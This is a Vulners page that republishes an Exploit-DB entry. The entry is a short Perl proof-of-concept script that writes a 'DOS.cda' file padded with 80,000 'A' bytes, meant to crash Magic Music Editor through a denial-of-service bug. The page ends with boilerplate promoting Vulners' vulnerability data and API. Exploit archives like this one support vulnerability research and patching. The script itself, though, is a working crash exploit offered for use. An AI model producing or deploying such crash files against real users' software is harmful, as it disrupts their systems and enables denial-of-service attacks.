Lucene search
K

Magic Music Editor - '.cda' Denial of Service

🗓️ 28 Feb 2011 00:00:00Reported by AtT4CKxT3rR0r1STType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 15 Views

Magic Music Editor '.cda' Denial of Service vulnerability in All Version

Code
#!/usr/bin/perl
# Exploit Title: Magic Music Editor .cda DOS
# Version      : All Version
# Author       : AtT4CKxT3rR0r1ST  [[email protected]]
# Download     : http://www.magic-video-software.com/magic_music_editor/download.html
# Sp3C!4L Gr34T$ T0 h1ch4m 
##############################################################
my $file= "DOS.cda"; 
my $junk = "\x41" x 80000; 
open($FILE,">$file"); 
print $FILE $junk; 
close($FILE); 
print "Files Created successfully\n"; 
sleep(1);
 		 	   		  

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation